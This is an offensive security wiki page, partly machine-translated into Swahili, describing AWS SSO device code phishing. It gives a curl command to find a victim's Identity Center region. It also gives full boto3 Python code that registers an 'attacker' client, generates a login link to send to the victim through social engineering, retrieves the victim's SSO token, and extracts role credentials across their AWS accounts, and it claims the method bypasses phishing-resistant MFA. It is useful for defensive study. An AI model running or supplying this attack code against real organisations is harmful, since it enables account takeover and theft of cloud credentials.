AWS - Identity Center & SSO Unauthenticated Enum

AWS Device Code Phishing

Kwanza ilipendekezwa katika hiki kipande cha blog, inawezekana kutuma kiungo kwa mtumiaji anaye tumia AWS SSO kwamba ikiwa mtumiaji atakubali mshambuliaji ataweza kupata token ya kujifanya kuwa mtumiaji na kufikia majukumu yote ambayo mtumiaji anaweza kufikia katika Identity Center.

Ili kutekeleza shambulio hili, mahitaji ni:

• Mwathirika anahitaji kutumia Identity Center

• Mshambuliaji lazima ajue subdomain inayotumiwa na mwathirika <victimsub>.awsapps.com/start

Kwa kutumia taarifa hizo, mshambuliaji ataweza kutuma kiungo kwa mtumiaji kwamba ikiwa kikubaliwa kitampa mshambuliaji ufikiaji wa akaunti ya mtumiaji wa AWS.

Attack

1. Finding the subdomain

Hatua ya kwanza ya mshambuliaji ni kugundua subdomain ambayo kampuni ya mwathirika inatumia katika Identity Center yao. Hii inaweza kufanywa kupitia OSINT au kukisia + BF kwani kampuni nyingi zitakuwa zikitumika jina lao au toleo la jina lao hapa.

Kwa kutumia taarifa hii, inawezekana kupata eneo ambapo Identity Center ilipangwa na:

curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
"region":"us-east-1

2. Tengeneza kiungo kwa mwathiriwa & Tuma

Run the following code to generate an AWS SSO login link so the victim can authenticate. Kwa ajili ya onyesho, run this code in a python console and do not exit it as later you will need some objects to get the token:

import boto3

REGION = 'us-east-1' # CHANGE THIS
AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS

sso_oidc = boto3.client('sso-oidc', region_name=REGION)
client = sso_oidc.register_client(
clientName = 'attacker',
clientType = 'public'
)

client_id = client.get('clientId')
client_secret = client.get('clientSecret')
authz = sso_oidc.start_device_authorization(
clientId=client_id,
clientSecret=client_secret,
startUrl=AWS_SSO_START_URL
)

url = authz.get('verificationUriComplete')
deviceCode = authz.get('deviceCode')
print("Give this URL to the victim: " + url)

Send the generated link to the victim using you awesome social engineering skills!

3. Subiri hadi mwathirika akubali

Ikiwa mwathirika alikuwa tayari ameingia AWS atahitaji tu kukubali kutoa ruhusa, ikiwa hakuwa, atahitaji kuingia na kisha kukubali kutoa ruhusa. Hii ndiyo jinsi ya kuonyesha inavyoonekana siku hizi:

4. Pata token ya SSO

Ikiwa mwathirika alikubali kuonyesha,endesha hii code ili kuunda token ya SSO kwa kujifanya kuwa mtumiaji:

token_response = sso_oidc.create_token(
clientId=client_id,
clientSecret=client_secret,
grantType="urn:ietf:params:oauth:grant-type:device_code",
deviceCode=deviceCode
)
sso_token = token_response.get('accessToken')

The SSO access token is valid for 8h.

5. Jifanya kuwa mtumiaji

sso_client = boto3.client('sso', region_name=REGION)

# List accounts where the user has access
aws_accounts_response = sso_client.list_accounts(
accessToken=sso_token,
maxResults=100
)
aws_accounts_response.get('accountList', [])

# Get roles inside an account
roles_response = sso_client.list_account_roles(
accessToken=sso_token,
accountId=<account_id>
)
roles_response.get('roleList', [])

# Get credentials over a role

sts_creds = sso_client.get_role_credentials(
accessToken=sso_token,
roleName=<role_name>,
accountId=<account_id>
)
sts_creds.get('roleCredentials')

Phishing the unphisable MFA

Ni furaha kujua kwamba shambulio la awali linafanya kazi hata kama "MFA isiyoweza kudanganywa" (webAuth) inatumika. Hii ni kwa sababu mchakato wa awali hauondoki kwenye eneo la OAuth lililotumika. Si kama katika shambulio zingine za phishing ambapo mtumiaji anahitaji kubadilisha eneo la kuingia, katika kesi ambapo mchakato wa nambari ya kifaa umeandaliwa hivyo nambari inajulikana na kifaa na mtumiaji anaweza kuingia hata kwenye mashine tofauti. Ikiwa ombi litakubaliwa, kifaa, kwa kujua nambari ya awali, kitakuwa na uwezo wa kurejesha akiba kwa mtumiaji.

Kwa maelezo zaidi kuhusu hii angalia chapisho hili.

Automatic Tools

• https://github.com/christophetd/aws-sso-device-code-authentication

• https://github.com/sebastian-mora/awsssome_phish

References

• https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/

• https://ruse.tech/blogs/aws-sso-phishing

• https://mjg59.dreamwidth.org/62175.html

• https://ramimac.me/aws-device-auth